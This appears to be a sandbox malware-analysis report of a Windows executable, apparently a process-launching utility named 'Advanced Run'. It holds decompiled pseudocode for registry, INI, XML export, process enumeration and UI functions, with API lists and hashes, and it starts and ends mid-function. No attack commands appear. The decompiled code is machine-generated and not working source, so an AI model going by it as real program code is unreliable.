                                                                                                                						}
                                                                                                                					}
                                                                                                                					wcscat(_t34,  &_v516);
                                                                                                                					_t35 = _t35 + 1;
                                                                                                                				} while (_t35 < 0x80);
                                                                                                                				return _t34;
                                                                                                                			}


                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: wcscat$_snwprintfmemset
                                                                                                                • String ID: %2.2X
                                                                                                                • API String ID: 2521778956-791839006
                                                                                                                • Opcode ID: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                                                • Instruction ID: 93e5f8641594d75a0278127c9762c797554eaad4f41234795e116b90c7bd1a0f
                                                                                                                • Opcode Fuzzy Hash: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                                                • Instruction Fuzzy Hash: FA01B57394072566E72067569C86BBB33ACEB41714F10407BFD14B91C2EB7CDA444ADC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 42%
                                                                                                                			E00407D80(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                                				void _v514;
                                                                                                                				char _v516;
                                                                                                                				void _v1026;
                                                                                                                				char _v1028;
                                                                                                                				void* __esi;
                                                                                                                				intOrPtr* _t16;
                                                                                                                				void* _t19;
                                                                                                                				intOrPtr* _t29;
                                                                                                                				char* _t31;
                                                                                                                
                                                                                                                				_t29 = __ecx;
                                                                                                                				_v516 = 0;
                                                                                                                				memset( &_v514, 0, 0x1fc);
                                                                                                                				_v1028 = 0;
                                                                                                                				memset( &_v1026, 0, 0x1fc);
                                                                                                                				_t16 = _t29;
                                                                                                                				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
                                                                                                                					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
                                                                                                                				} else {
                                                                                                                					_push(L"<?xml version=\"1.0\" ?>\r\n");
                                                                                                                				}
                                                                                                                				E00407343(_t16);
                                                                                                                				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
                                                                                                                				_t31 =  &_v516;
                                                                                                                				E00407250(_t31, _t19);
                                                                                                                				_push(_t31);
                                                                                                                				_push(L"<%s>\r\n");
                                                                                                                				_push(0xff);
                                                                                                                				_push( &_v1028);
                                                                                                                				L0040B1EC();
                                                                                                                				return E00407343(_t29, _a4,  &_v1028);
                                                                                                                			}













                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00407DD0
                                                                                                                • <?xml version="1.0" ?>, xrefs: 00407DC9
                                                                                                                • <%s>, xrefs: 00407DF3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf
                                                                                                                • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                • API String ID: 3473751417-2880344631
                                                                                                                • Opcode ID: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                                                • Instruction ID: f522b8c77a058770ba0888167d6ec5df55c59d6d485a4440fbbc7c77367e2349
                                                                                                                • Opcode Fuzzy Hash: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                                                • Instruction Fuzzy Hash: E0019BB1E402197AD710A695CC45FBE766CEF44344F0001FBBA08F3191D738AE4586ED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 70%
                                                                                                                			E00403B3C(intOrPtr _a4) {
                                                                                                                				void _v526;
                                                                                                                				char _v528;
                                                                                                                				void _v2574;
                                                                                                                				char _v2576;
                                                                                                                				void* __edi;
                                                                                                                				intOrPtr _t29;
                                                                                                                
                                                                                                                				_v2576 = 0;
                                                                                                                				memset( &_v2574, 0, 0x7fe);
                                                                                                                				_v528 = 0;
                                                                                                                				memset( &_v526, 0, 0x208);
                                                                                                                				E00404AD9( &_v528);
                                                                                                                				_push( &_v528);
                                                                                                                				_push(L"\"%s\" /EXEFilename \"%%1\"");
                                                                                                                				_push(0x3ff);
                                                                                                                				_push( &_v2576);
                                                                                                                				L0040B1EC();
                                                                                                                				_t37 = _a4 + 0xa68;
                                                                                                                				E00404923(0x104, _a4 + 0xa68, L"exefile");
                                                                                                                				E00404923(0x104, _a4 + 0xc72, L"Advanced Run");
                                                                                                                				E00404923(0x3ff, _t37 + 0x414,  &_v2576);
                                                                                                                				_t29 = E0040467A(_t37);
                                                                                                                				 *((intOrPtr*)(_a4 + 0x167c)) = _t29;
                                                                                                                				return _t29;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00403B5D
                                                                                                                • memset.MSVCRT ref: 00403B76
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • _snwprintf.MSVCRT ref: 00403B9F
                                                                                                                  • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                  • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                  • Part of subcall function 0040467A: memset.MSVCRT ref: 004046AF
                                                                                                                  • Part of subcall function 0040467A: _snwprintf.MSVCRT ref: 004046CD
                                                                                                                  • Part of subcall function 0040467A: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                                  • Part of subcall function 0040467A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf$CloseFileModuleNameOpenmemcpywcslen
                                                                                                                • String ID: "%s" /EXEFilename "%%1"$Advanced Run$exefile
                                                                                                                • API String ID: 1832587304-479876776
                                                                                                                • Opcode ID: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                                                • Instruction ID: c5548abdd2f98fe5b378efca96f69d72dd5acd8230f4ce7b006819db5738462c
                                                                                                                • Opcode Fuzzy Hash: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                                                • Instruction Fuzzy Hash: 6B11A3B29403186AD720E761CC05ACF776CDF45314F0041B6BA08B71C2D77C5B418B9E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040AFBE(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
                                                                                                                				void* _v8;
                                                                                                                				int _v12;
                                                                                                                				short _v524;
                                                                                                                				char _v1036;
                                                                                                                				void* __edi;
                                                                                                                
                                                                                                                				wcscpy( &_v524, L"\\StringFileInfo\\");
                                                                                                                				wcscat( &_v524, _a8);
                                                                                                                				wcscat( &_v524, "\\");
                                                                                                                				wcscat( &_v524, _a12);
                                                                                                                				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
                                                                                                                					return 0;
                                                                                                                				}
                                                                                                                				_t34 =  &_v1036;
                                                                                                                				E00404923(0xff,  &_v1036, _v8);
                                                                                                                				E004049A2(_t34, __esi);
                                                                                                                				return 1;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • wcscpy.MSVCRT ref: 0040AFD3
                                                                                                                • wcscat.MSVCRT ref: 0040AFE2
                                                                                                                • wcscat.MSVCRT ref: 0040AFF3
                                                                                                                • wcscat.MSVCRT ref: 0040B002
                                                                                                                • VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040B01C
                                                                                                                  • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                  • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                  • Part of subcall function 004049A2: lstrcpyW.KERNEL32(?,?), ref: 004049B7
                                                                                                                  • Part of subcall function 004049A2: lstrlenW.KERNEL32(?), ref: 004049BE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                                                                • String ID: \StringFileInfo\
                                                                                                                • API String ID: 393120378-2245444037
                                                                                                                • Opcode ID: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                                • Instruction ID: 46c7c43bb965d9609608e4f6c2ae6b517043b349f439a100f6d085a340de75fe
                                                                                                                • Opcode Fuzzy Hash: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                                • Instruction Fuzzy Hash: CF015EB290020DA6DB11EAA2CC45DDF776DDB44304F0005B6B654F2092EB3CDA969A98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfwcscpy
                                                                                                                • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                • API String ID: 999028693-502967061
                                                                                                                • Opcode ID: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                                • Instruction ID: fc2f6d5a95cb840c7437c23e5da9cc5f651b22c54dcbfaa02992beb3cb27aad2
                                                                                                                • Opcode Fuzzy Hash: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                                • Instruction Fuzzy Hash: CDE08C31A94B00B5E96423418DC7F2B2801DE90B14FB0083BF686B05C1E6BDBA0528DF
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 35%
                                                                                                                			E004092F0(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
                                                                                                                				void* _v0;
                                                                                                                				intOrPtr _v4;
                                                                                                                				intOrPtr _v8;
                                                                                                                				unsigned int _v12;
                                                                                                                				void* _v16;
                                                                                                                				char _v20;
                                                                                                                				char _v24;
                                                                                                                				intOrPtr _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				intOrPtr _v44;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				intOrPtr _t58;
                                                                                                                				void* _t59;
                                                                                                                				void* _t72;
                                                                                                                				intOrPtr _t78;
                                                                                                                				void _t89;
                                                                                                                				signed int _t90;
                                                                                                                				int _t98;
                                                                                                                				signed int _t105;
                                                                                                                				signed int _t106;
                                                                                                                
                                                                                                                				_t106 = _t105 & 0xfffffff8;
                                                                                                                				E0040B550(0x8874, __ecx);
                                                                                                                				_t98 = 0;
                                                                                                                				_a8 = 0;
                                                                                                                				if(E00404BD3() == 0 ||  *0x4101bc == 0) {
                                                                                                                					if( *0x4101b8 != _t98) {
                                                                                                                						_t89 = _a4;
                                                                                                                						_t58 =  *0x40f83c(8, _t89);
                                                                                                                						_v8 = _t58;
                                                                                                                						if(_t58 != 0xffffffff) {
                                                                                                                							_v0 = 1;
                                                                                                                							_a560 = 0x428;
                                                                                                                							_t59 =  *0x40f834(_t58,  &_a560);
                                                                                                                							while(_t59 != 0) {
                                                                                                                								memset( &_a8, _t98, 0x21c);
                                                                                                                								_a12 = _a580;
                                                                                                                								_a8 = _t89;
                                                                                                                								wcscpy( &_a16,  &_a1096);
                                                                                                                								_a540 = _a576;
                                                                                                                								_t106 = _t106 + 0x14;
                                                                                                                								_a544 = _a572;
                                                                                                                								_a552 = 0x428;
                                                                                                                								if(E00409510(_a8,  &_a8) != 0) {
                                                                                                                									_t59 =  *0x40f830(_v16,  &_a552);
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                								goto L18;
                                                                                                                							}
                                                                                                                							goto L18;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t72 = OpenProcess(0x410, 0, _a4);
                                                                                                                					_v0 = _t72;
                                                                                                                					if(_t72 != 0) {
                                                                                                                						_push( &_a4);
                                                                                                                						_push(0x8000);
                                                                                                                						_push( &_a2160);
                                                                                                                						_push(_t72);
                                                                                                                						if( *0x40f840() != 0) {
                                                                                                                							_t6 =  &_v12;
                                                                                                                							 *_t6 = _v12 >> 2;
                                                                                                                							_v8 = 1;
                                                                                                                							_t90 = 0;
                                                                                                                							if( *_t6 != 0) {
                                                                                                                								while(1) {
                                                                                                                									_a1616 = _t98;
                                                                                                                									memset( &_a1618, _t98, 0x208);
                                                                                                                									memset( &_a8, _t98, 0x21c);
                                                                                                                									_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
                                                                                                                									_t106 = _t106 + 0x18;
                                                                                                                									_a8 = _a4;
                                                                                                                									_a12 = _t78;
                                                                                                                									 *0x40f838(_v16, _t78,  &_a1616, 0x104);
                                                                                                                									E0040920A( &_v0,  &_a1600);
                                                                                                                									_push(0xc);
                                                                                                                									_push( &_v20);
                                                                                                                									_push(_v4);
                                                                                                                									_push(_v32);
                                                                                                                									if( *0x40f844() != 0) {
                                                                                                                										_a508 = _v32;
                                                                                                                										_a512 = _v36;
                                                                                                                									}
                                                                                                                									if(E00409510(_a8,  &_v24) == 0) {
                                                                                                                										goto L18;
                                                                                                                									}
                                                                                                                									_t90 = _t90 + 1;
                                                                                                                									if(_t90 < _v44) {
                                                                                                                										_t98 = 0;
                                                                                                                										continue;
                                                                                                                									} else {
                                                                                                                									}
                                                                                                                									goto L18;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L18:
                                                                                                                						CloseHandle(_v16);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _a8;
                                                                                                                			}

























                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00408CE3,00000000,00000000), ref: 0040932B
                                                                                                                • memset.MSVCRT ref: 0040938D
                                                                                                                • memset.MSVCRT ref: 0040939D
                                                                                                                  • Part of subcall function 0040920A: wcscpy.MSVCRT ref: 00409233
                                                                                                                • memset.MSVCRT ref: 00409488
                                                                                                                • wcscpy.MSVCRT ref: 004094A9
                                                                                                                • CloseHandle.KERNEL32(?,00408CE3,?,?,?,00408CE3,00000000,00000000), ref: 004094FF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 3300951397-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 44%
                                                                                                                			E00402EC8(void* __ebx) {
                                                                                                                				struct tagRECT _v20;
                                                                                                                				struct tagPAINTSTRUCT _v84;
                                                                                                                
                                                                                                                				GetClientRect( *(__ebx + 0x10),  &_v20);
                                                                                                                				_v20.left = _v20.right - GetSystemMetrics(0x15);
                                                                                                                				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
                                                                                                                				asm("movsd");
                                                                                                                				asm("movsd");
                                                                                                                				asm("movsd");
                                                                                                                				asm("movsd");
                                                                                                                				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
                                                                                                                				return EndPaint( *(__ebx + 0x10),  &_v84);
                                                                                                                			}






                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 19018683-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 50%
                                                                                                                			E004079A4(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                				void _v514;
                                                                                                                				signed short _v516;
                                                                                                                				signed short* _t34;
                                                                                                                				signed int _t37;
                                                                                                                				void* _t40;
                                                                                                                				signed short* _t44;
                                                                                                                				void* _t46;
                                                                                                                
                                                                                                                				_t40 = __edi;
                                                                                                                				E00407343(__edi, _a4, L"<item>\r\n");
                                                                                                                				_t37 = 0;
                                                                                                                				if( *((intOrPtr*)(__edi + 0x2c)) > 0) {
                                                                                                                					do {
                                                                                                                						_v516 = _v516 & 0x00000000;
                                                                                                                						memset( &_v514, 0, 0x1fc);
                                                                                                                						E0040ADF1( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x60))),  *((intOrPtr*)(__edi + 0x64)));
                                                                                                                						_t44 =  &_v516;
                                                                                                                						E00407250(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x40)) + 0x10)));
                                                                                                                						_t34 = _t44;
                                                                                                                						_push(_t34);
                                                                                                                						_push( *((intOrPtr*)(__edi + 0x64)));
                                                                                                                						_push(_t34);
                                                                                                                						_push(L"<%s>%s</%s>\r\n");
                                                                                                                						_push(0x2000);
                                                                                                                						_push( *((intOrPtr*)(__edi + 0x68)));
                                                                                                                						L0040B1EC();
                                                                                                                						_t46 = _t46 + 0x24;
                                                                                                                						E00407343(__edi, _a4,  *((intOrPtr*)(__edi + 0x68)));
                                                                                                                						_t37 = _t37 + 1;
                                                                                                                					} while (_t37 <  *((intOrPtr*)(__edi + 0x2c)));
                                                                                                                				}
                                                                                                                				return E00407343(_t40, _a4, L"</item>\r\n");
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004079DB
                                                                                                                  • Part of subcall function 0040ADF1: memcpy.MSVCRT ref: 0040AE6E
                                                                                                                  • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                                  • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                                • _snwprintf.MSVCRT ref: 00407A25
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                • API String ID: 1775345501-2769808009
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 64%
                                                                                                                			E0040467A(void* __edi) {
                                                                                                                				signed int _v8;
                                                                                                                				void* _v12;
                                                                                                                				void* _v16;
                                                                                                                				void _v2062;
                                                                                                                				short _v2064;
                                                                                                                				int _t16;
                                                                                                                
                                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                                				_t16 = E004043F8( &_v12, 0x20019);
                                                                                                                				if(_t16 == 0) {
                                                                                                                					_v2064 = _v2064 & _t16;
                                                                                                                					memset( &_v2062, _t16, 0x7fe);
                                                                                                                					_push(__edi + 0x20a);
                                                                                                                					_push(L"%s\\shell\\%s");
                                                                                                                					_push(0x3ff);
                                                                                                                					_push( &_v2064);
                                                                                                                					L0040B1EC();
                                                                                                                					if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
                                                                                                                						_v8 = 1;
                                                                                                                						RegCloseKey(_v16);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _v8;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004046AF
                                                                                                                • _snwprintf.MSVCRT ref: 004046CD
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpen_snwprintfmemset
                                                                                                                • String ID: %s\shell\%s
                                                                                                                • API String ID: 1458959524-3196117466
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 16%
                                                                                                                			E00409D5F(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
                                                                                                                				signed short _v131076;
                                                                                                                
                                                                                                                				_t25 = __esi;
                                                                                                                				E0040B550(0x20000, __ecx);
                                                                                                                				if(_a4 == 0) {
                                                                                                                					return GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24);
                                                                                                                				} else {
                                                                                                                					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
                                                                                                                						_push(_a24);
                                                                                                                					} else {
                                                                                                                						_v131076 = _v131076 & 0x00000000;
                                                                                                                						_push(__esi);
                                                                                                                						_push(L"\"%s\"");
                                                                                                                						_push(0xfffe);
                                                                                                                						_push( &_v131076);
                                                                                                                						L0040B1EC();
                                                                                                                						_push(_a24);
                                                                                                                						_push( &_v131076);
                                                                                                                					}
                                                                                                                					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
                                                                                                                				}
                                                                                                                			}





                                                                                                                APIs
                                                                                                                • wcschr.MSVCRT ref: 00409D79
                                                                                                                • _snwprintf.MSVCRT ref: 00409D9E
                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409DBC
                                                                                                                • GetPrivateProfileStringW.KERNEL32 ref: 00409DD4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                • String ID: "%s"
                                                                                                                • API String ID: 1343145685-3297466227
                                                                                                                • Opcode ID: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                                                • Instruction ID: cff84325bbeeabecfb89bf19508a3778b9d9768fc6139f0f3fcaa17558a1ecc1
                                                                                                                • Opcode Fuzzy Hash: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                                                • Instruction Fuzzy Hash: BA018B3244421AFADF219F90DC45FDA3B6AEF04348F008065BA14701E3D739C921DB98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 38%
                                                                                                                			E004047D2(long __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                                                				char _v2052;
                                                                                                                				short _v4100;
                                                                                                                				void* __edi;
                                                                                                                				long _t15;
                                                                                                                				long _t16;
                                                                                                                
                                                                                                                				_t15 = __ecx;
                                                                                                                				E0040B550(0x1000, __ecx);
                                                                                                                				_t16 = _t15;
                                                                                                                				if(_t16 == 0) {
                                                                                                                					_t16 = GetLastError();
                                                                                                                				}
                                                                                                                				E00404706(_t16,  &_v2052);
                                                                                                                				_push( &_v2052);
                                                                                                                				_push(_t16);
                                                                                                                				_push(L"Error %d: %s");
                                                                                                                				_push(0x400);
                                                                                                                				_push( &_v4100);
                                                                                                                				L0040B1EC();
                                                                                                                				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(?,?,004035EB,?,?), ref: 004047E6
                                                                                                                • _snwprintf.MSVCRT ref: 00404813
                                                                                                                • MessageBoxW.USER32(?,?,Error,00000030), ref: 0040482C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastMessage_snwprintf
                                                                                                                • String ID: Error$Error %d: %s
                                                                                                                • API String ID: 313946961-1552265934
                                                                                                                • Opcode ID: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                                                • Instruction ID: 90e5118ee4f46ea14b6138c5fdcdbe0805ab296af9aaa7bfd3b1d45c15712702
                                                                                                                • Opcode Fuzzy Hash: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                                                • Instruction Fuzzy Hash: 30F08975500208A6C711A795CC46FD572ACEB44785F0401B6B604F31C1DB78AA448A9C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 90%
                                                                                                                			E004068EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
                                                                                                                				void* _v8;
                                                                                                                				signed int _v12;
                                                                                                                				void* __ebx;
                                                                                                                				void* __ecx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t74;
                                                                                                                				signed int _t76;
                                                                                                                				signed short _t85;
                                                                                                                				signed int _t87;
